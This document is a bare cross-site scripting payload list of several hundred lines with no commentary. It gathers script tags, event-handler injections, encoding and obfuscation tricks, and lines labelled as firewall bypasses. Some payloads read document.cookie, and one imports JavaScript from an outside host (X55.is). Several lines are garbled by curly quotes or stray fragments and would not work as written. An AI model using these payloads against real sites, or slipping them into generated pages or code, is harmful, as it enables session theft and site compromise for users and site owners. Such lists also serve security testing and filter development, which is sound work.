<script>eval(‘a\u006cert(1)’);</script>
<script>eval(‘a\x6cert(1)’);</script>
<script>eval(‘a\154ert(1)’);</script>
<script>eval(‘a\l\ert\(1\)’);</script>
<script>eval(‘al’+’ert(1)’);</script>
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41));</script>
<script>eval(atob(‘amF2YXNjcmlwdDphbGVydCgxKQ’));</script>
<script>’alert(1)’.replace(/.+/,eval)</script>
<script>function::[‘alert’](1)</script>
<script>alert(document[‘cookie’])</script>
<script>with(document)alert(cookie)</script>
<script><script>alert(1)</script>
<scr<script>ipt>alert(1)</script>
<scr<object>ipt>alert(1)</script>
<noscript><p title="</noscript><img src=x onerror=([,O,B,J,E,C,,]=[]+{},
[T,R,U,E,F,A,L,S,,,N]=[!!O]+!O+B.E)[X=C+O+N+S+T+R+U+C+T+O+R][X](A+L+E+R+T+
(document.cookie))()>">
\uff1c\uff53\uff43\uff52\uff49\uff50\uff54\uff1e\uff41\uff4c\uff45\uff52\uff54\
uff08\uff07\uff58\uff53\uff53\uff07\uff09\uff1c\uff0f\uff53\uff43\uff52\uff49\
uff50\uff54\uff1e
%uff1cscript%uff1ealert(1234)%uff1c/script%uff1e
javascript:eval(unescape(location.href))
1&"><script>alert(1)</script>=1
#1&"><script>alert(1)</script>=1
</scr</script>ipt><ifr<iframeame/onload=prompt()>whs
<script>alert(“xss”)</script>
<img src=x onerror=alert(“falcon”)>
<script>alert(document.domain)</script>
<img src=x onerror=alert(document.domain)>
<body onload=alert(“bingo”)>
#<body onload=alert(“bingo”)>
<Script>alert()</Script>
<svg/onload=alert(“Hacked”)>
#<svg/onload=alert(“Hacked”)>
&lt;script&gt;alert(&#39;123&#39;);&lt;/script&gt;
<img src=x onerror=alert(123) />
<svg><script>123<1>alert(123)</script>
"><script>alert(123)</script>
'><script>alert(123)</script>
><script>alert(123)</script>
</script><script>alert(123)</script>
< / script >< script >alert(123)< / script >
onfocus=JaVaSCript:alert(123) autofocus
"onfocus=JaVaSCript:alert(123) autofocus
<script>alert(123)</script>
%20<script>alert(1)</script>
%E5%98%8D%E5%98%8A%20<script>alert(1)</script>
%0d%0a%20<script>alert(1)</script>
%3F%20<script>alert(1)</script>
%20"><svg onload=alert(1)>
%E5%98%8D%E5%98%8A%20"><svg onload=alert(1)>
%0d%0a%20"><svg onload=alert(1)>
%3F%20"><svg onload=alert(1)>
%20<img src=1 onerror=alert(1)>
<Svg OnLoad=alert(1)>
%E5%98%8D%E5%98%8A%20<img src=1 onerror=alert(1)>
%0d%0a%20<img src=1 onerror=alert(1)>
%3F%20<img src=1 onerror=alert(1)>
%20javascript:alert(1)
%E5%98%8D%E5%98%8A%20javascript:alert(1)
%0d%0a%20javascript:alert(1)
%3F%20javascript:alert(1)
%20"><img src=q onerror=alert(1)>
%E5%98%8D%E5%98%8A%20"><img src=q onerror=alert(1)>
%0d%0a%20"><img src=q onerror=alert(1)>
%3F%20"><img src=q onerror=alert(1)>
%20"><img src=x onerror=prompt(document.domain);>
%E5%98%8D%E5%98%8A%20"><img src=x onerror=prompt(document.domain);>
%0d%0a%20"><img src=x onerror=prompt(document.domain);>
%3F%20"><img src=x onerror=prompt(document.domain);>
%20<script>prompt(document.domain)</script>
%E5%98%8D%E5%98%8A%20<script>prompt(document.domain)</script>
%0d%0a%20<script>prompt(document.domain)</script>
%3F%20<script>prompt(document.domain)</script>
%20<img/src/onerror=alert(ibro`)>
%E5%98%8D%E5%98%8A%20<img/src/onerror=alert(ibro`)>
%0d%0a%20<img/src/onerror=alert(ibro`)>
%3F%20<img/src/onerror=alert(ibro`)>
%20<body onload=alert("bingo")>
%E5%98%8D%E5%98%8A%20<body onload=alert("bingo")>
%0d%0a%20<body onload=alert("bingo")>
%3F%20<body onload=alert("bingo")>
%20%3Cimg%20src=1%20onerror=alert(1)%3E
<sc<script>ript>alert(123)</sc</script>ript>
--><script>alert(123)</script>
";alert(123);t="
';alert(123);t='
#';alert(123);t='
JavaSCript:alert(123)
;alert(123);
src=JaVaSCript:prompt(132)
"><script>alert(123);</script x="
'><script>alert(123);</script x='
><script>alert(123);</script x=
" autofocus onkeyup="javascript:alert(123)
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
<svg></p><style><a id="</style><img src=1 onerror=alert(1)>">
'`"><\x3Cscript>javascript:alert(1)</script>
ABC<div style="x:expression\x5C(javascript:alert(1)">DEF
ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF
<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a>
`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)>
<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)>
"`'><script>\x3Bjavascript:alert(1)</script>
<img \x00src=x onerror="alert(1)">
<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a>
<script src="/\%(jscript)s"></script>
classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"
onqt_error="javascript:alert(1)"
onclick="javascript:alert(1);">XXX</a></a><a
href="javascript:javascript:alert(1)">XXX</a>
<script>with(document.getElementById("d"))innerHTML=innerHTML</script>
<script>Object.__noSuchMethod__ = Function,[{}]
[0].constructor._('javascript:alert(1)')()</script>
<img src onerror /" '"= alt=javascript:alert(1)//">
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x
onerror=javascript:alert(1)></a>">
<!--[if]><script>javascript:alert(1)</script-->
<!--xss"><img src=x onerror=alert(1)>-->
<!--[if<img src=x onerror=javascript:alert(1)//]>-->
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG onmouseover="alert('xxs')">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS')"
<body language=vbs onload=confirm-1
"<body/onload=&lt;!--&gt;&#10confirm(1);prompt(/XSS/.source)>"
"\"><body/onload=&lt;!--&gt;&#10confirm(1);prompt(/XSS/.source)>",
<button autofocus onfocus=confirm(2)>
'`"><*chr*script>log(*num*)</script>
"><img src="/" =_=" title="onerror='prompt(1)'">
"><input+TyPE="hxlxmj"+STyLe="display:none;"+onfocus="this.style.display='block';
+this.onfocus=null;"+oNMoUseOVer="this['onmo'+'useover']=null;eval(String.fromCharC
ode(99,111,110,102,105,114,109,40,100,111,99,117,109,101,110,116,46,100,111,109,97,
105,110,41));"+AuToFOcus>
<img language=vbs src=<b onerror=confirm#1/1#>
"]<img src=1 onerror=confirm(1)>
#"]<img src=1 onerror=confirm(1)>
/#<img src=1 onerror=javascript:confirm(3)>
"><img src=javascript:while([{}]);>
<img/src/onerror=alert&#xFEFF;(1)>
#'%22/onload=alert(document.domain)//
xss"><input%20type=hidden%20oncontentvisibilityautostatechange=alert?.%26lpar;)
%20style=content-visibility:auto>
" onfocus="alert('chux')" autofocus="" />
%3Cscr%3C!--esi--%3Eipt%3Ealer%3C!--esi--%3Et%281%29%3C%2Fsc%3C!--esi--%3Eript%3E
<img/ src//'onerror/''/=confirm(1)//'>
"\"><img src=\"x\" onerror=\"confirm(0)\"/>",
<img src=x onerror=URL='javascript:confirm(1)'>
#<img src=x onerror=URL='javascript:confirm(1)'>
"><img src=x onerror=confirm('x') />]
"><img src=x onerror=prompt(document.cookie);>
%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%28document.cookie%29%3B%3E
#%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%28document.cookie%29%3B%3E
%2522%253E%253Cimg%2520src%253Dx%2520onerror%253Dprompt%2528document.cookie
%2529%253B%253E
Ij48aW1nIHNyYz14IG9uZXJyb3I9cHJvbXB0KGRvY3VtZW50LmNvb2tpZSk7Pg==
<img src=xx: onerror=confirm(document.location)>
onwebkitmouseforcechanged%3Dalert%28document.cookie%29+XSS
"><details/open/id="&XSS"ontoggle=alert("XSS_WAF_BYPASS_:-)")>
"><img/src/onerror='alert("XSS_WAF_BYPASS_:-)")'>
"<svg/onload='alert("XSS_WAF_BYPASS_:-)")'>
"><details/open/id="%26XSS"ontoggle=alert("XSS_WAF_BYPASS_:-)")>
"><div/id="XSS"onmouseover='alert("XSS_WAF_BYPASS_:-)")'>
"><iframe/srcdoc='<script>alert("XSS_WAF_BYPASS_:-)")</script>'>
"><video><source onerror='alert("XSS_WAF_BYPASS_:-)")'></video>
"><div/id="&XSS"onmouseover=alert("XSS_WAF_BYPASS_:-)")>
'><span/id="&XSS"onclick=alert("XSS_WAF_BYPASS_:-)")>
'><input/type="text"value='"&XSS'onfocus=alert("XSS_WAF_BYPASS_:-)")>
<--`<img/src=` onerror=confirm(1)> --!>
<img/src=x alt=confirm(1) onmouseover=eval(alt)>
><imgsrc=x onerror=confirm.onerror=confirm(1)>
"><input value=<><iframe/src=javascript:confirm(1)
</plaintext\></|\><plaintext/onmouseover=prompt(1)
"<script>1-confirm(0);</script>"/>
"/><script>+-+-1-+-+confirm(1)</script>
<script>(0)['constructor']['constructor']("\141\154\145\162\164(1)")();</script>
<script>+-+-1-+-+confirm(1)</script>
"<script>'confirm(0)%3B<%2Fscript>"
"\"><script>'confirm(0)%3B<%2Fscript>",
<script>'confirm(0)%3B<%2Fscript>
"'`><script>log*chr*(*num*)</script>
</script><svg onload='-/"/-confirm(1)//'"
<script>x=""-prompt(9)-"";y=42;</script>
<svg id=1 onload=confirm(1)>
#<svg id=1 onload=confirm(1)>
<svg onload=confirm(1)
"><svg onload="confirm(7)">
<svg onload="confirm(7)">
<svg onload=eval(URL)>
<svg onload=eval(document.cookie)>
<svg onload=eval(window.name)>
\x3Cscript>javascript:alert(1)</script>
'"`><script>/* *\x2Fjavascript:alert(1)// */</script>
<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> -->
--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> -->
<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
"`'><script>\x09javascript:alert(1)</script>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<script src="data:text/javascript,alert(1)"></script>
<script/src=data:text/
&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,alert(4)></script>
"`'><script>\x7Ejavascript:alert(1)</script>
</script><x ng-app ng-csp>{{constructor.constructor('alert(1)')()}}
<script>x=””%prompt(9)%””;y=42;</script>
<script>x=””&&prompt(9)&&””;y=42;</script>
<script>x=””&prompt(9)&””;y=42;</script>
<script>x=””*prompt(9)*””;y=42;</script>
<script>x=””+prompt(9)+””;y=42;</script>
<script>x=””-prompt(9)-””;y=42;</script>
<script>x=””/prompt(9)/””;y=42;</script>
<script>x=””<<prompt(9)<<””;y=42;</script>
<script>x=””<=prompt(9)<=””;y=42;</script>
<script>x=””<prompt(9)<””;y=42;</script>
<script>x=””===prompt(9)===””;y=42;</script>
<script>x=””==prompt(9)==””;y=42;</script>
<script>x=””>=prompt(9)>=””;y=42;</script>
<script>x=””>>>prompt(9)>>>””;y=42;</script>
<script>x=””>>prompt(9)>>””;y=42;</script>
<script>x=””>prompt(9)>””;y=42;</script>
<script>x=””?prompt(9):””;y=42;</script>
“><svg/a=#”onload=’/*#*/prompt(1)’
‘te’ > alert(‘>’) > ‘xt’;
‘te’ ? alert(‘?:’) : ‘xt’;
‘te’ ^ alert(‘^’) ^ ‘xt’;
‘te’ | alert(‘|’) | ‘xt’;
‘te’ — alert(‘-’) — ‘xt’;
<iframe/src \/\/onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
\<a onmouseover="alert(document.cookie)"\>xxs link\</a\>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"\>
<IMG SRC= onmouseover="alert('xxs')">
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC=" &#14; javascript:alert('XSS');">
<IMG SRC="('XSS')"
\\";alert('XSS');//
‘); alert(‘XSS
‘|alert(‘XSS’)|’
“;alert(‘XSS’);//
({[alert`xss`]:1})
: ({[alert`xss`]:1})
‘;alert(/xss/)///’;alert(1)//”;alert(2)///”;alert(3)//
→</SCRIPT>”>’><SCRIPT>alert(/xss/)</SCRIPT>=&{}”);}alert(6);functions+xss(){//
);alert(xss-by-shawar);//
alert(/xss/.source)
'); alert('xss'); var x='
‘); alert(‘xss’); var x=’
alt=’”name=’onerror=alert()//’
\\”;alert(‘XSS’);//
\”;;alert(‘;XSS’;);//
\";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<IMG LOWSRC="javascript:alert('XSS')">
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="livescript:[code]">
Set.constructor`alert\x28document.domain\x29
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<XSS STYLE="xss:expression(alert('XSS'))">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
#<iframe src="javascript:alert('XSS');"></iframe>
#<body onload="alert('XSS')">
d="alert('XSS');\")";
echo('IPT>alert("XSS")</SCRIPT>'); ?>
<Img src = x onerror = "javascript: window.onerror = alert; throw XSS">
<Video> <source onerror = "javascript: alert (XSS)">
(A(%22onerror='alert%601%60'testabcd))/
<applet code="javascript:confirm(document.cookie);">
<isindex x="javascript:" onmouseover="alert(XSS)">
"><img src="x:x" onerror="alert(XSS)">
<img src="x:gif" onerror="window['al\u0065rt'](0)"></img>
"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)">" -confirm(3)-
<input type="text" value="XSS" />
<body onload=alert("XSS")>
<marquee onstart=alert("XSS")>
<base href="javascript:alert('XSS');">
<form action="javascript:alert('XSS')"><input type="submit"></form>
<embed src="javascript:alert('XSS');">
<object data="javascript:alert('XSS');"></object>
<script src="data:text/javascript,alert('XSS');"></script>
<blink onmouseover="alert('XSS')">Hover me</blink>
<link rel="stylesheet" href="javascript:alert('XSS');">
<!--<script>alert('XSS')</script>-->
<noscript><p title="</noscript><script>alert(1)</script>">
<li onclick="alert(1)">XSS</li>
<svg><animate onbegin=alert(1) attributeName=x dur=1s></animate>
<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4="></
iframe>
<?xml version="1.0" ?><svg><script>alert(1)</script></svg>
<canvas onmousemove=alert(1)>XSS</canvas>
<applet code="javascript:alert(1);"></applet>
<img dynsrc="javascript:alert(1)">
<img lowsrc="javascript:alert(1)">
<output onload=alert(1)>XSS</output>
<progress value=100 onmouseover=alert(1)>
<bgsound src="javascript:alert(1)">
<isindex action="javascript:alert(1)">
<xss id=x tabindex=1 onactivate=alert(1)>
<animate onbegin=alert(1) attributeName=x dur=1s>
<animateMotion onbegin=alert(1) attributeName=x dur=1s>
<feImage href="javascript:alert(1)">
<mpath href="javascript:alert(1)">
<unknown onmouseover=alert(1)>XSS</unknown>
<?xml-stylesheet href="javascript:alert(1)"?>
<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-
equiv="refresh"/>
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<Svg+OnLoad=import('//X55.is')>#alert(document.domain)// )
<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
<form><a href="javascript:\u0061lert(1)">X
</script><img/*%00/src="worksinchrome&colon;prompt(1)"/%00*/onerror='eval(src)'>
<style>//*{x:expression(alert(/xss/))}//<style></style>
<iframe
src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAUAAAAFCAIAAABQZ2zoAAAACXBIWXMA
AAsTAAALEwEAmpwYAAAAB3RJTUUH5QMFBCciFC9eyQAAAAlwSFlzAAALEwAACxMBAJqcGAAAABl0RVh0Q29
tbWVudABDcmVhdGVkIHdpdGggR0lNUFeBDhcAAAANSURBVAjXY/j//
z8DPYAJDAAEcQEGgDp5cAAAAAElFTkSuQmCC">
<svg><foreignObject><body xmlns="http://www.w3.org/1999/xhtml"
onload="alert(1)"></body></foreignObject></svg>
<svg><filter><feGaussianBlur in="SourceGraphic" stdDeviation="1"
onmouseover="alert(1)" /></filter></svg>
<svg><clippath id="x"><image width="100" height="100"
href="javascript:alert(1)"/></clippath></svg>
<svg><pattern id="x" width="100" height="100" patternUnits="userSpaceOnUse"><rect
width="100" height="100" style="fill: #000;"/><animate attributeName="x" from="0"
to="100" dur="5s" repeatCount="indefinite" onbegin="alert(1)"/></pattern></svg>
<svg><switch><g requiredExtensions="http://www.w3.org/1999/xhtml"
systemLanguage="en"><foreignObject><body xmlns="http://www.w3.org/1999/xhtml"
onload="alert(1)"></body></foreignObject></g></switch></svg>
<svg><altGlyphItem><glyphRef
xlink:href="javascript:alert(1)"/></altGlyphItem></svg>
<svg><cursor xlink:href="javascript:alert(1)"/></svg>
<svg><view xlink:href="javascript:alert(1)"/></svg>
<svg><color-profile xlink:href="javascript:alert(1)"/></svg>
<script onload="alert(1)"></script>
<form action="javascript:alert(1)"><input type="submit" /></form>
<plaintext><script>alert(1)</script>
<svg xmlns:xlink="http://www.w3.org/1999/xlink"><a
xlink:href="javascript:alert(1)">XSS</a></svg>
<svg xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink"><a
xlink:href="javascript:alert(1)">XSS</a></svg>
<link href="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=">
<link rel="import"
href="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=">
<style onload="alert(1)"></style>
<meta http-equiv="refresh" content="0;url=javascript:alert('XSS');">
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";a
lert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></
SCRIPT>"'>><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";a
lert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></
SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'"--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL"
VALUE="javascript:alert(1)"></OBJECT>
<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F
%73%63%72%69%70%74%3E"></iframe>
a=alert,a(1)
[1].find(alert)
top[“al”+”ert”](1)
top[‘al\x65rt’](1)
top[8680439..toString(30)](1)
<button onClick="alert('xss')">Submit</button>
<svg><animate onend=alert(1) attributeName=x dur=1s>
<audio src/onerror=alert(1)>
<a href="javascript:x='&percnt;27-alert(1)-%27';">XSS</a>
<script src=data:text/javascript;base64,YWxlcnQoMSk=></script>
<script
src=data:text/javascript;base64,&#x59;&#x57;&#x78;&#x6c;&#x63;&#x6e;&#x51;&#x6f;&#x
4d;&#x53;&#x6b;&#x3d;></script>
<script src=data:text/javascript;base64,%59%57%78%6c%63%6e%51%6f%4d%53%6b%3d></
script>
<iframe srcdoc=&lt;script&gt;alert&lpar;1&rpar;&lt;&sol;script&gt;></iframe>
<iframe
src="javascript:'&#x25;&#x33;&#x43;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;
&#x45;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x25;&#x33;&#x43;&#x25;&#x32
;&#x46;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;'"></iframe>
<img src=x onerror=location=atob`amF2YXNjcmlwdDphbGVydChkb2N1bWVudC5kb21haW4p`>
<script>onerror=alert;throw 1</script>
<script>{onerror=alert}throw 1</script>
<script>throw onerror=alert,1</script>
<script>throw onerror=eval,e=new Error,e.message='alert\x281\x29',e</script>
<script>throw onerror=Uncaught=eval,e=new Error,e.message='/*'+location.hash,!!
window.InstallTrigger?e:e.message</script>
<script>throw/
x/,onerror=Uncaught=eval,h=location.hash,e=Error,e.lineNumber=e.columnNumber=e.file
Name=e.message=h[2]+h[1]+h,!!window.InstallTrigger?e:e.message</script>
<script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>
<script>location='javascript:alert\x281\x29'</script>
<script>location=name</script>
#&lt;img src=1 onerror=alert(1)&gt;
&lt;img src=x onerror=print()&gt;
&quot;onmouseover=&quot;alert(1)
#&quot;onmouseover=&quot;alert(1)
#javasc&#114;ipt:alert(1)
javasc&#114;ipt:alert(1)?q=%26callback%3Durc_button.click%23
#&quot;&gt;&lt;img src=x onerror=prompt(document.domain);&gt;
1&quot;)&quot;&lt;&#33;&#45;&#45;&gt;&lt;Svg OnLoad=(confirm)(1)&#45;&#45;&gt;
<script>alert`1`</script>
<script>throw[onerror]=[alert],1</script>
<script>var{haha:onerror=alert}=0;throw 1</script>
<script>new Function`X${document.location.hash.substr`1`}`</script>
<script>Function`X${document.location.hash.substr`1`}```</script>
<script>var{a:onerror}={a:alert};throw 1</script>
blah(""+new class b{toString=e=>location=name}+"")</script>
<xss class=progress-bar-animated onanimationstart=alert(1)>
<script>import('data:text/javascript,alert(1)')</script>
<xss class="carousel slide" data-ride=carousel data-interval=100
ontransitionend=alert(1)><xss class=carousel-inner><xss class="carousel-item
active"></xss><xss class=carousel-item></xss></xss></xss>
<iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>
<iframe srcdoc="&lt;img src=1 onerror=alert(1)&gt;"></iframe>
<a href="&#X6A;avascript:alert(1)">XSS</a>
<form action="javascript:alert(1)"><input type=submit id=x></form><label
for=x>XSS</label>
<script>\u0061lert(1)</script>
<script>\u{61}lert(1)</script>
<script>eval('\x61lert(1)')</script>
<a href="&#0000106avascript:alert(1)">XSS</a>
<a href="&#x6a;avascript:alert(1)">XSS</a>
≋ "><!'/*"*\'/*\"/*--></Script><Image SrcSet=K */; OnError=confirm(document.domain)
//># ≋
%2f%2a%2a%2f%75%6e%69%6f%6e%2f%2a%2a%2f%73%65%6c%65%63%74
">'><details/open/ontoggle=confirm('XSS')>
<input type="hidden" value="mypayload" /> %22%20autofocus%20onfocus%3d(confirm)
(1)%2f%2f
%22%20autofocus%20onfocus%00%3d(confirm)(1)%2f%2f
javascript:new%20Function`al\ert\`1\``;
6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/
&amp;amp;lt;script&amp;amp;gt;alert(1)&amp;amp;lt;/script&amp;amp;gt;
&amp;amp;amp;lt;script&amp;amp;amp;gt;alert(1)&amp;amp;amp;lt;/
script&amp;amp;amp;gt;
&amp;amp;amp;amp;lt;script&amp;amp;amp;amp;gt;alert(1)&amp;amp;amp;amp;lt;/
script&amp;amp;amp;amp;gt;
&lt;img src=1 onerror=alert(1)&gt;
&amp;lt;img src=1 onerror=alert(1)&amp;gt;
&amp;amp;lt;img src=1 onerror=alert(1)&amp;amp;gt;
&amp;amp;amp;lt;img src=1 onerror=alert(1)&amp;amp;amp;gt;
&amp;amp;amp;amp;lt;img src=1 onerror=alert(1)&amp;amp;amp;amp;gt;
"&lt;img src=1 onerror=alert(1)&gt;
"&amp;lt;img src=1 onerror=alert(1)&amp;gt;
"&amp;amp;lt;img src=1 onerror=alert(1)&amp;amp;gt;
"&amp;amp;amp;lt;img src=1 onerror=alert(1)&amp;amp;amp;gt;
"&amp;amp;amp;amp;lt;img src=1 onerror=alert(1)&amp;amp;amp;amp;gt;
"&gt;&lt;img src=x onerror=prompt(document.domain);&gt;
"&amp;gt;&amp;lt;img src=x onerror=prompt(document.domain);&amp;gt;
"&amp;amp;gt;&amp;amp;lt;img src=x onerror=prompt(document.domain);&amp;amp;gt;
"&amp;amp;amp;gt;&amp;amp;amp;lt;img src=x
onerror=prompt(document.domain);&amp;amp;amp;gt;
"&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;img src=x
onerror=prompt(document.domain);&amp;amp;amp;amp;gt;
"&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;img src=x
onerror=prompt(document.domain);&amp;amp;amp;amp;amp;gt;
”&gt;&lt;svg onload=alert&amp;#0000000040"1")&gt;
”&amp;gt;&amp;lt;svg onload=alert&amp;amp;#0000000040"1")&amp;gt;
”&amp;amp;gt;&amp;amp;lt;svg onload=alert&amp;amp;amp;#0000000040"1")&amp;amp;gt;
”&amp;amp;amp;gt;&amp;amp;amp;lt;svg
onload=alert&amp;amp;amp;amp;#0000000040"1")&amp;amp;amp;gt;
”&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;svg
onload=alert&amp;amp;amp;amp;amp;#0000000040"1")&amp;amp;amp;amp;gt;
"&gt;&lt;svg onload=alert(1)&gt;
"&amp;gt;&amp;lt;svg onload=alert(1)&amp;gt;
"&amp;amp;gt;&amp;amp;lt;svg onload=alert(1)&amp;amp;gt;
"&amp;amp;amp;gt;&amp;amp;amp;lt;svg onload=alert(1)&amp;amp;amp;gt;
"&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;svg onload=alert(1)&amp;amp;amp;amp;gt;
&lt;img/src/onerror=alert(`ibro`)&gt;
&amp;lt;img/src/onerror=alert(`ibro`)&amp;gt;
&amp;amp;lt;img/src/onerror=alert(`ibro`)&amp;amp;gt;
&amp;amp;amp;lt;img/src/onerror=alert(`ibro`)&amp;amp;amp;gt;
&amp;amp;amp;amp;lt;img/src/onerror=alert(`ibro`)&amp;amp;amp;amp;gt;
javascript:\/\/\'\/<\/title><\/style><\/textarea><\/script>--><p%22%20%0D%20%0A
%20onclick%3Dalert(123)%2F%2F%3E*%2Falert()%2F*%3Cimg%20src%3Dx%20onerror
%3Dalert(456)%2F%3E%3Csvg%2Fonload%3Dprompt(789)%2F%3E%3B\'%22%2F%2F%20%3A%3Bfn()
%3B%0A%0D%0A%0D%0A%0D%0A%09{{12*12+\'Audi%20RS5\'.substr(0,4)}}XXX%3Cscript
%3Ealert(\'XSS\')
javascript:\\\/\\\/\\\'\\\/<\\\/title><\\\/style><\\\/textarea><\\\/script>--><p
%22%20%0D%20%0A%20onclick%3Dalert(123)%2F%2F%3E*%2Falert()%2F*%3Cimg%20src%3Dx
%20onerror%3Dalert(456)%2F%3E%3Csvg%2Fonload%3Dprompt(789)%2F%3E%3B\\\'%22%2F%2F
%20%3A%3Bfn()%3B%0A%0D%0A%0D%0A%0D%0A%09{{12*12+\\\'Audi%20RS5\\\'.substr(0,4)}}XXX
%3Cscript%3Ealert(\\\'XSS\\\')
javascript:\\\\\\\/\\\\\\\/\\\\\\\'\\\\\\\/<\\\\\\\/title><\\\\\\\/style><\\\\\\\/
textarea><\\\\\\\/script>--><p%22%20%0D%20%0A%20onclick%3Dalert(123)%2F%2F%3E*
%2Falert()%2F*%3Cimg%20src%3Dx%20onerror%3Dalert(456)%2F%3E%3Csvg%2Fonload
%3Dprompt(789)%2F%3E%3B\\\\\\\'%22%2F%2F%20%3A%3Bfn()%3B%0A%0D%0A%0D%0A%0D%0A
%09{{12*12+\\\\\\\'Audi%20RS5\\\\\\\'.substr(0,4)}}XXX%3Cscript
%3Ealert(\\\\\\\'XSS\\\\\\\')
javascript:\/\/%250Aalert(1)
javascript:\\\/\\\/%250Aalert(1)
javascript:\\\\\\\/\\\\\\\/%250Aalert(1)
javascript:\\\\\\\\\\\\\\\/\\\\\\\\\\\\\\\/%250Aalert(1)
jaVasCript:\/*-\/*`\/*\\`\/*\'\/*\"\/**\/(\/* *\/oNcliCk=alert() )\/\/%0D%0A%0D
%0A\/\/<\/stYle\/<\/titLe\/<\/teXtarEa\/<\/scRipt\/--!>\\x3csVg\/<sVg\/
oNloAd=alert()\/\/>\\x3e
jaVasCript:\\\/*-\\\/*`\\\/*\\\\`\\\/*\\\'\\\/*\\\"\\\/**\\\/(\\\/*
*\\\/oNcliCk=alert()
)\\\/\\\/%0D%0A%0D%0A\\\/\\\/<\\\/stYle\\\/<\\\/titLe\\\/<\\\/teXtarEa\\\/<\\\/
scRipt\\\/--!>\\\\x3csVg\\\/<sVg\\\/oNloAd=alert()\\\/\\\/>\\\\x3e
jaVasCript:\\\\\\\/*-\\\\\\\/*`\\\\\\\/*\\\\\\\\`\\\\\\\/*\\\\\\\'\\\\\\\/
*\\\\\\\"\\\\\\\/**\\\\\\\/(\\\\\\\/* *\\\\\\\/oNcliCk=alert() )\\\\\\\/\\\\\\\/%0D
%0A%0D%0A\\\\\\\/\\\\\\\/<\\\\\\\/stYle\\\\\\\/<\\\\\\\/titLe\\\\\\\/<\\\\\\\/
teXtarEa\\\\\\\/<\\\\\\\/scRipt\\\\\\\/--!>\\\\\\\\x3csVg\\\\\\\/<sVg\\\\\\\/
oNloAd=alert()\\\\\\\/\\\\\\\/>\\\\\\\\x3e
window['alert']()
this['alert']()
(alert)()
eval(atob('YWxlcnQoKQ=='))
document['cookie']
<a href="javascript:x='%27-alert(1)-%27';">XSS</a>
<marquee width=1 loop=1 onfinish=alert(1)>XSS</marquee>
<input onauxclick=alert(1)>
<video onfullscreenchange=alert(1) src=validvideo.mp4 controls>
